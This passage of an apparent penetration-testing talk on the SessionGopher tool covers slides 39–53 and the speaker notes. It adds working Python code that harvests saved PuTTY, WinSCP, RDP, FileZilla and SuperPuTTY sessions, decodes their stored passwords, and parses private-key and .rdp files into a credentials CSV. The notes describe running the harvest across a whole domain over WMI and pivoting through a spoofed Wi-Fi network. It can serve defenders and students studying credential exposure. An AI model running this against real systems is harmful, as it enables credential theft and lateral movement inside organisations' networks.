  • 39. Paths to Sessions Stored in Registry • PuTTY • HKEY_USERS\<SID>\SOFTWARE\SimonTatham\PuTTY\Sessions • WinSCP • HKEY_USERS\<SID>\SOFTWARE\Martin Prikryl\WinSCP 2\Sessions • Microsoft Remote Desktop • HKEY_USERS\<SID>\SOFTWARE\Microsoft\Terminal Server Client\Servers • Non-registry (assumes filename/location unchanged) • FileZilla • <Drive>:\Users\<Username>\AppData\Roaming\FileZilla\sitemanager.xml • SuperPuTTY • <Drive>:\Users\<Username>\Documents\SuperPuTTY\Sessions.xml
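The three registry locations on the slide, worked through offline as an added Python example (not SessionGopher's code): a parser for the text of a `reg export HKU hku.reg` dump (the .reg file is UTF-16; it is assumed to have been decoded to a string already) that walks every SID subkey, recognises the PuTTY, WinSCP and Terminal Server Client session stores, and turns each saved session into a host/port/user record. The sample export, its SID, hosts and values are constructed; the WinSCP Password value is a placeholder, not real output.

```python
import re
from urllib.parse import unquote

# Constructed sample: the shape of `reg export HKU hku.reg` after decoding
# from UTF-16, trimmed to three keys of interest. The WinSCP "Password"
# value is a placeholder string, not a real obfuscated password.
SAMPLE_REG = r"""Windows Registry Editor Version 5.00

[HKEY_USERS\S-1-5-21-1111111111-2222222222-3333333333-1105\SOFTWARE\SimonTatham\PuTTY\Sessions\prod-db01]
"HostName"="10.0.30.15"
"PortNumber"=dword:00000016
"UserName"="root"
"PublicKeyFile"="C:\\Users\\jdoe\\keys\\db01.ppk"

[HKEY_USERS\S-1-5-21-1111111111-2222222222-3333333333-1105\SOFTWARE\Martin Prikryl\WinSCP 2\Sessions\files%20server]
"HostName"="files.corp.com"
"PortNumber"=dword:00000016
"UserName"="deploy"
"Password"="A35C09FF1E8B5ACD"

[HKEY_USERS\S-1-5-21-1111111111-2222222222-3333333333-1105\SOFTWARE\Microsoft\Terminal Server Client\Servers\jump01.corp.com]
"UsernameHint"="CORP\\jdoe"
"""

_SID_KEY = re.compile(r"^HKEY_USERS\\(S-1-5-21-[\d-]+)\\(.+)$", re.IGNORECASE)

# Sub-key prefixes (lower-cased) under each SID where the clients keep sessions.
_STORES = {
    "software\\simontatham\\putty\\sessions\\": "PuTTY",
    "software\\martin prikryl\\winscp 2\\sessions\\": "WinSCP",
    "software\\microsoft\\terminal server client\\servers\\": "RDP",
}


def _decode_value(raw):
    """.reg value syntax: "string" (backslashes and quotes escaped) or dword:hex."""
    if raw.startswith("dword:"):
        return int(raw[len("dword:"):], 16)
    if raw.startswith('"') and raw.endswith('"'):
        return raw[1:-1].replace('\\"', '"').replace("\\\\", "\\")
    return raw                      # hex:, expandable strings etc. kept verbatim


def parse_reg_export(text):
    """Return {key path: {value name: value}} for a .reg file."""
    keys, current = {}, None
    for line in text.splitlines():
        line = line.strip()
        if line.startswith("[") and line.endswith("]"):
            current = line[1:-1]
            keys[current] = {}
        elif line.startswith('"') and current is not None:
            name, _, raw = line[1:].partition('"=')
            keys[current][name] = _decode_value(raw)
    return keys


def saved_sessions(keys):
    """Map every stored session to sid, tool, session name, host, port, user.
    PuTTY and WinSCP percent-encode session names, hence the unquote()."""
    found = []
    for path, values in keys.items():
        m = _SID_KEY.match(path)
        if not m:
            continue
        sid, sub = m.group(1), m.group(2)
        for prefix, tool in _STORES.items():
            if not sub.lower().startswith(prefix):
                continue
            name = unquote(sub[len(prefix):])
            if tool == "RDP":                       # key name is the target host
                host, port, user = name, 3389, values.get("UsernameHint")
            else:
                host, port, user = values.get("HostName"), values.get("PortNumber"), values.get("UserName")
            found.append({"sid": sid, "tool": tool, "session": name, "host": host,
                          "port": port, "user": user, "values": values})
    return found
```

The same parser works on an export of a hive you loaded yourself (`reg load HKU\tmp C:\Users\<user>\NTUSER.DAT`), which is how you reach the sessions of users who are not currently logged on.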
  • 40. WinSCP • HKEY_USERS\<SID>\Software\Martin Prikryl\WinSCP 2\Sessions\<SessionName> (HostName, UserName, obfuscated Password) • HKEY_USERS\<SID>\Software\Martin Prikryl\WinSCP 2\Configuration\Security (UseMasterPassword)
  • 41. (Image slide: WinSCP's password obfuscation algorithm; see Editor's Note 19)
  • 42. WinSCP (image slide: SessionGopher's built-in WinSCP deobfuscator; see Editor's Note 20)
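The WinSCP obfuscation shown on slides 41 and 42, as an added Python example (SessionGopher's own deobfuscator is PowerShell; this is a separate implementation of the same published algorithm). Each byte is bitwise-NOTed and XORed with the constant 0xA3 and written as two hex digits; the stored value is a flag byte, a dummy byte, the length, a count of random junk bytes, the junk, then username + hostname + password, padded to 50 bytes. A forward (obfuscating) function is included only so the decoder can be checked without a live registry; the session values in the test are constructed.

```python
import random

PWALG_SIMPLE_FLAG = 0xFF      # marks the current layout (key prefix + length byte)
PWALG_SIMPLE_MAGIC = 0xA3     # XOR constant
PWALG_SIMPLE_MAXLEN = 50      # output is always padded to 50 bytes (100 hex chars)


def _encode_byte(b):
    """One byte -> two hex chars: bitwise NOT, then XOR with the magic."""
    return "%02X" % (((~b) & 0xFF) ^ PWALG_SIMPLE_MAGIC)


def _decode_byte(hexpair):
    return (~(int(hexpair, 16) ^ PWALG_SIMPLE_MAGIC)) & 0xFF


def winscp_deobfuscate(stored_hex, username, hostname):
    """Reverse the obfuscation of a WinSCP session 'Password' value.

    Returns the plaintext, or None if the embedded key prefix does not match
    the session (WinSCP prepends UserName + HostName; the reversed order is
    tried too so a dump with the two fields swapped still decodes)."""
    data = [_decode_byte(stored_hex[i:i + 2]) for i in range(0, len(stored_hex), 2)]
    pos = 0
    flag = data[pos]; pos += 1
    if flag == PWALG_SIMPLE_FLAG:
        pos += 1                       # dummy byte
        length = data[pos]; pos += 1
    else:
        length = flag                  # legacy layout: first byte is the length
    shift = data[pos]; pos += 1        # number of random junk bytes before the payload
    pos += shift
    plain = bytes(data[pos:pos + length])
    if flag != PWALG_SIMPLE_FLAG:
        return plain.decode("utf-8", "replace")
    for key in (username + hostname, hostname + username):
        if plain.startswith(key.encode("utf-8")):
            return plain[len(key):].decode("utf-8", "replace")
    return None


def winscp_obfuscate(password, username, hostname, rng=None):
    """Forward direction, mirroring WinSCP, so the decoder can be checked
    without a live registry. `rng` only feeds the junk bytes."""
    rng = rng or random.Random(0)
    payload = (username + hostname + password).encode("utf-8")
    if len(payload) > 255:
        raise ValueError("too long for the one-byte length field")
    shift = rng.randrange(PWALG_SIMPLE_MAXLEN - len(payload)) if len(payload) < PWALG_SIMPLE_MAXLEN else 0
    out = [_encode_byte(PWALG_SIMPLE_FLAG), _encode_byte(0x00),
           _encode_byte(len(payload)), _encode_byte(shift)]
    out += [_encode_byte(rng.randrange(256)) for _ in range(shift)]
    out += [_encode_byte(b) for b in payload]
    while len(out) < PWALG_SIMPLE_MAXLEN:
        out.append(_encode_byte(rng.randrange(256)))
    return "".join(out)
```

Because the flag and dummy bytes are constant, every value produced this way starts with the hex digits A35C, which makes obfuscated WinSCP passwords easy to grep for in a registry dump. When UseMasterPassword is 1 the value is real encryption under the master password and this decoder returns None or garbage.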
  • 43. Paths to Sessions • HKEY_USERS\<SID>\SOFTWARE\Microsoft\Terminal Server Client\Default (MRU list of the most recent RDP targets; see Editor's Note 21)
  • 44. FileZilla <Drive>:\Users\<Username>\AppData\Roaming\FileZilla\sitemanager.xml • Saved passwords are only base64-encoded, not encrypted (see Editor's Note 22)
  • 45. SuperPuTTY <Drive>:\Users\<Username>\Documents\SuperPuTTY\Sessions.xml • The ExtraArgs field can contain a plaintext password (-pw ...)
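Both XML session stores from slides 44 and 45, parsed by an added Python example (not SessionGopher's code). The two sample files are constructed: the element and attribute names follow the layout FileZilla 3 (sitemanager.xml, `<Pass encoding="base64">`) and SuperPuTTY (Sessions.xml, one `SessionData` element per session with an `ExtraArgs` attribute) write, while the hosts, users and passwords are invented. Older FileZilla files kept `<Pass>` in plaintext, and the parser handles that case too.

```python
import base64
import shlex
import xml.etree.ElementTree as ET

# Constructed sample files (layout as the tools write it; contents invented).
FILEZILLA_SITEMANAGER = """<?xml version="1.0" encoding="UTF-8"?>
<FileZilla3 version="3.24.0" platform="windows">
  <Servers>
    <Server>
      <Host>files.corp.com</Host><Port>22</Port><Protocol>1</Protocol><Type>0</Type>
      <User>deploy</User>
      <Pass encoding="base64">U3VtbWVyMjAxNyE=</Pass>
      <Logontype>1</Logontype>
      <Name>prod file server</Name>
    </Server>
    <Server>
      <Host>legacy.corp.com</Host><Port>21</Port><Protocol>0</Protocol><Type>0</Type>
      <User>ftpadmin</User>
      <Pass>ftpadmin123</Pass>
      <Logontype>1</Logontype>
      <Name>legacy ftp</Name>
    </Server>
  </Servers>
</FileZilla3>
"""

SUPERPUTTY_SESSIONS = """<?xml version="1.0" encoding="utf-8"?>
<ArrayOfSessionData xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance" xmlns:xsd="http://www.w3.org/2001/XMLSchema">
  <SessionData SessionId="Linux/db01" SessionName="db01" ImageKey="computer" Host="10.0.30.15" Port="22" Proto="SSH" PuttySession="Default Settings" Username="root" ExtraArgs="-pw Winter2017! -X" />
  <SessionData SessionId="Linux/web01" SessionName="web01" ImageKey="computer" Host="web01.corp.com" Port="22" Proto="SSH" PuttySession="Default Settings" Username="ops" ExtraArgs="" />
</ArrayOfSessionData>
"""


def filezilla_sites(xml_text):
    """Every saved site in sitemanager.xml. <Pass> is base64 when the element
    says so (FileZilla 3.x) and plaintext in older files; neither is encryption."""
    sites = []
    for server in ET.fromstring(xml_text.encode("utf-8")).iter("Server"):
        pw_el = server.find("Pass")
        password = None
        if pw_el is not None and pw_el.text:
            if pw_el.get("encoding") == "base64":
                password = base64.b64decode(pw_el.text).decode("utf-8", "replace")
            else:
                password = pw_el.text
        sites.append({"tool": "FileZilla", "name": server.findtext("Name"),
                      "host": server.findtext("Host"), "port": int(server.findtext("Port") or 0),
                      "user": server.findtext("User"), "password": password})
    return sites


def _password_from_extra_args(extra_args):
    """SuperPuTTY hands ExtraArgs straight to PuTTY, so a one-click session
    stores the password in the clear as '-pw <value>'."""
    tokens = shlex.split(extra_args or "")
    for i, tok in enumerate(tokens[:-1]):
        if tok == "-pw":
            return tokens[i + 1]
    return None


def superputty_sessions(xml_text):
    sessions = []
    for sd in ET.fromstring(xml_text.encode("utf-8")).iter("SessionData"):
        sessions.append({"tool": "SuperPuTTY", "name": sd.get("SessionName"),
                         "host": sd.get("Host"), "port": int(sd.get("Port") or 0),
                         "user": sd.get("Username"),
                         "password": _password_from_extra_args(sd.get("ExtraArgs"))})
    return sessions
```

Both functions return the same record shape, so their output can be concatenated with the registry sessions and written out as one CSV of hosts, users and credentials.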
  • 46. PuTTY .ppk Files • One-click PuTTY logins • The private key can be stored unencrypted (as here) or encrypted with a passphrase; the Encryption: header says which
  • 47. Microsoft .rdp Files • Double-clicking launches the connection, but the file is plain text and can be read by dragging it into a text editor • Plethora of arguments, many optional • Host, whether it is an admin session, whether to prompt for credentials, etc. • Format: Fieldname:TypeOfField:Value • TypeOfField = i (integer) or s (string); b marks binary, e.g. the DPAPI-protected "password 51:b:" blob, which only decrypts in the saving user's context
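The two file formats from slides 46 and 47, parsed by an added Python example (SessionGopher does this in PowerShell; this is separate code). `parse_ppk` splits a PuTTY private key file into its header fields, joins the base64 public and private blobs, and reports whether the private half is passphrase-protected; `parse_rdp` reads the name:type:value lines of an .rdp file and `rdp_summary` picks out the fields that matter for lateral movement. Both sample files are constructed: the .ppk blobs are short dummies, not real key material, and the hosts and names are invented. Real .rdp files are often UTF-16 with a BOM; they are assumed to have been decoded to text first.

```python
# Constructed samples. The .ppk blobs are short dummies, not real key material;
# the layout (header lines, line counts, Private-MAC) matches PuTTY's format.
SAMPLE_PPK = """PuTTY-User-Key-File-2: ssh-rsa
Encryption: none
Comment: rsa-key-20170301
Public-Lines: 2
AAAAB3NzaC1yc2EAAAABJQAAAIEAq7Vq3h1n4q9hYb0lfJz6gVq1mq5HfV7Wb3xkZQ5yVYB
ZGF0YS1mb3ItZGVtby1vbmx5LW5vdC1hLXJlYWwta2V5
Private-Lines: 2
AAAAgFhPg6kUyTRx7yQfCn2h5kqk0r5uQ3gPD5Z0fVHo9F0Ck3Y1rQ4b
bm90LWEtcmVhbC1wcml2YXRlLWtleS1ibG9i
Private-MAC: 0f1e2d3c4b5a69788796a5b4c3d2e1f00f1e2d3c
"""

SAMPLE_RDP = """screen mode id:i:2
full address:s:jump01.corp.com
username:s:CORP\\jdoe
domain:s:CORP
administrative session:i:1
prompt for credentials:i:0
gatewayhostname:s:rdgw.corp.com
"""


def parse_ppk(text):
    """Split a PuTTY private key file into its fields and say whether the
    private half is usable as-is (Encryption: none) or passphrase-protected."""
    lines = text.splitlines()
    fields, i = {}, 0
    while i < len(lines):
        key, sep, value = lines[i].partition(": ")
        i += 1
        if not sep:
            continue
        if key in ("Public-Lines", "Private-Lines"):
            n = int(value)
            fields[key] = "".join(lines[i:i + n])     # base64 blob spans n lines
            i += n
        else:
            fields[key] = value
    header = next(k for k in fields if k.startswith("PuTTY-User-Key-File-"))
    cipher = fields.get("Encryption", "none")
    return {"format_version": int(header.rsplit("-", 1)[1]), "key_type": fields[header],
            "comment": fields.get("Comment"), "cipher": cipher, "encrypted": cipher != "none",
            "public_blob": fields.get("Public-Lines"), "private_blob": fields.get("Private-Lines"),
            "private_mac": fields.get("Private-MAC")}


def parse_rdp(text):
    """One 'name:type:value' per line. i -> int, s -> str, b -> hex string kept as-is."""
    fields = {}
    for raw in text.splitlines():
        line = raw.strip().lstrip("\ufeff")
        if not line or line.count(":") < 2:
            continue
        name, kind, value = line.split(":", 2)      # value itself may contain ':'
        fields[name] = int(value) if kind == "i" else value
    return fields


def rdp_summary(fields):
    """The parts of a saved .rdp session an attacker or responder cares about."""
    return {"host": fields.get("full address"),
            "username": fields.get("username"),
            "admin_session": bool(fields.get("administrative session", 0)),
            "prompts_for_credentials": bool(fields.get("prompt for credentials", 0)),
            "gateway": fields.get("gatewayhostname"),
            "has_saved_password": "password 51" in fields}
```

An unencrypted .ppk is a working credential the moment it is copied off the host; an encrypted one still gives you the key type, comment and a blob to crack offline. For .rdp files, a saved "password 51" blob is DPAPI-protected and only useful if you can run as the user who saved it, but the host, username and gateway fields alone already draw the map of where that workstation is allowed to go.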
  • 48–49. (Image slides: SessionGopher parsing .ppk and .rdp files, and running it: . .\SessionGopher.ps1 followed by Invoke-SessionGopher -Thorough; see Editor's Notes 25–26)
  • 50. Windows Management Instrumentation (WMI) • Rather than running SessionGopher on each computer (impractical), we can use WMI • Built-in Invoke-WmiMethod cmdlet in PowerShell • Remote registry querying via the StdRegProv class (requires local admin on the target and DCOM/RPC reachability)
  • 51. (Image slide: SessionGopher run over WMI; see Editor's Notes 27–28)
  • 52. Write to CSV (Invoke-SessionGopher -o) • Create a mapping of the network • Aggregate all session data across the entire domain or a targeted set of computers • Essentially, see the physical infrastructure of the network!
  • 53. QUESTIONS? Twitter: @arvanaghi GitHub: https://github.com/fireeye/SessionGopher Brandon Arvanaghi

Editor's Notes

  1. SessionGopher: https://github.com/fireeye/SessionGopher
  2. https://community.rapid7.com/community/infosec/blog/2015/02/23/osint-through-sender-policy-framework-spf-records The receiving mail server automatically checks the SPF record for the domain, if they exist.
  3. Social engineering opportunities arise from seeing third-party relationships all from a DNS record!
  4. SEC form 10-K, exhibit 21. Form that discloses a company’s subsidiaries.
  5. SEC form 10-K, exhibit 21. Form that discloses a company’s subsidiaries.
  6. SEC form 10-K, exhibit 21. Form that discloses a company’s subsidiaries. Primary target for attacking a large organization: small, lesser-known subsidiaries.
  7. Command-line syntax: HELO <domain> prepares the SMTP server for use; MAIL FROM:<email address> sets the mail sender; RCPT TO:<email address> sets the mail recipient; DATA introduces the message (headers From, To, Subject, then the content, ended by a line containing only "."). Image source: http://stackoverflow.com/questions/11046135/how-to-send-email-using-simple-smtp-commands-via-gmail
  8. Source: http://www.myintranetdashboard.com/graphics/screen2b.gif
  9. EyeWitness by Christopher Truncer: https://github.com/ChrisTruncer/EyeWitness EyeWitness automatically screenshots every HTTP/HTTPS port discovered by Nmap for you, and makes an attempt at classifying the kind of site it is. When EyeWitness recognizes a login page, it provides the default credentials typically used for that product. Photo taken from https://www.christophertruncer.com/eyewitness-triage-tool/
  10. Wired-in network on the left with Ethernet. These hosts should, in theory, not be visible to any system not physically connected to their network. Security guards at the door, physical access controls, monitoring all wall ports, etc.
  11. On one of our engagements, we saw the physically-connected computers were still probing for remembered SSIDs because they had their WiFi turned on. Most people do not turn off their WiFi even when they are wired in, which can make them visible to the outside world!
  12. We spoofed the "gogoinflight" SSID and established an association between our TP-Link access point and the system. Now we could see the system on our own spoofed subnet, see what services it was running, and run tools against it.
  13. By running Responder or a social engineering campaign, we could use PsExec or WMIExec to exploit that system from our new subnet. Once we’ve gained access to that system, we could pivot to the wired internal network, since it is dual-homed! Essentially, we get access to the same wired-in benefits as any system physically connected. Despite this company not having any remote portal access or VPN, this physical security measure failed due to keeping WiFi enabled.
  14. System Preferences > Network > Advanced. It used to be that a more "preferred" association would make you drop your current association! E.g. if you were connected to CompanyWiFi but had gogoinflight higher in the preferred list and a gogoinflight SSID appeared, your system would automatically switch!
  15. https://github.com/fireeye/SessionGopher
  16. SID structure: S-1-5-21-<domain identifier>-<user RID>. Query all of these subkeys for domain users who have logged on! The Registry has both volatile and static data. As an example, HKEY_LOCAL_MACHINE\HARDWARE fills its subkeys at boot time after analyzing the hardware under the Windows system. HKEY_USERS holds the profile hives of users whose profiles are loaded on the system; the data itself persists in each user's NTUSER.DAT, so a logged-off user's hive can be loaded with reg load (or parsed offline) to get at the same artifacts. HKEY_CURRENT_USER is actually a link to the HKEY_USERS subkey of the currently logged-in user!
  17. Persistent artifacts from all these tools can help get a network mapping not just for Unix systems, but also jump boxes. Jump boxes can be difficult to find, but when extracting all saved RDP sessions from each host, you can see to where these servers RDP. Once you find a saved RDP session with a hostname you know to be a segmented environment, you know which server can communicate with that host!
  18. The saved Password value for WinSCP sessions is not encrypted by default. It is obfuscation, and it is easily reversible: the "key" mixed into it is just the session's username and hostname concatenated. The password is only encrypted when the UseMasterPassword value in the second registry subkey (Configuration\Security) is set to 1. If this is set, then you can only extract the encrypted value and attempt to brute-force the master password.
  19. As seen here, WinSCP's password obfuscation applies a sequence of bitwise operations (a bitwise NOT, then an XOR with a magic value) to each character. The obfuscation algorithm has been reverse engineered in several languages, but never before in PowerShell.
  20. SessionGopher’s built-in WinSCP deobfuscator
  21. HKEY_USERS\<SID>\SOFTWARE\Microsoft\Terminal Server Client\Default contains most recent RDP attempts
  22. FileZilla stores its password in an XML file, not in the registry. By default, the saved password is only base-64 encoded, and not encrypted.
  23. SuperPuTTY is used to manage simultaneous PuTTY sessions, and has the added benefit of storing passwords for one-click SSH sessions. PuTTY itself does not store passwords, so many clients use SuperPuTTY as a wrapper. SuperPuTTY sessions are saved in a Sessions.xml file, not in the registry. The password gets placed in the "ExtraArgs" attribute, which can contain a multitude of additional arguments; SuperPuTTY passes them to PuTTY, which treats whatever follows "-pw" as the password for the SSH session.
  24. Stored sessions as .rdp files can be used for one-click logins. These files are executable and can also be dragged into a text editor like Sublime Text and read.
  25. SessionGopher synthesizes the .ppk and .rdp files and makes sense of them. It returns the private key, the Private-MAC, and whether or not the key is encrypted.
  26. . .\SessionGopher.ps1 Invoke-SessionGopher -Thorough
  27. Invoke-WmiMethod allows you to use WMI to read the remote registry of a different system using -Class 'StdRegProv' (its EnumKey and GetStringValue methods; HKEY_USERS is hDefKey 2147483651, i.e. 0x80000003). From your own attack computer connected to the network, you can read the persistent registry artifacts of HKEY_USERS for each box using WMI. Quiet, quick, and effective! It does require local administrator rights on each target and DCOM/RPC (TCP 135 plus dynamic ports) reachability; Invoke-CimMethod over WinRM is the equivalent where only 5985/5986 is open.
  28. Invoke-SessionGopher -iL inputlist.txt; Invoke-SessionGopher -AllDomain; Invoke-SessionGopher -Target winbox.company.com. After running SessionGopher across a domain or set of computers, you will essentially have a network mapping of the entire corporate infrastructure! Jump boxes, Unix systems, and other non-domain hosts should all be revealed to you along with the path to get there.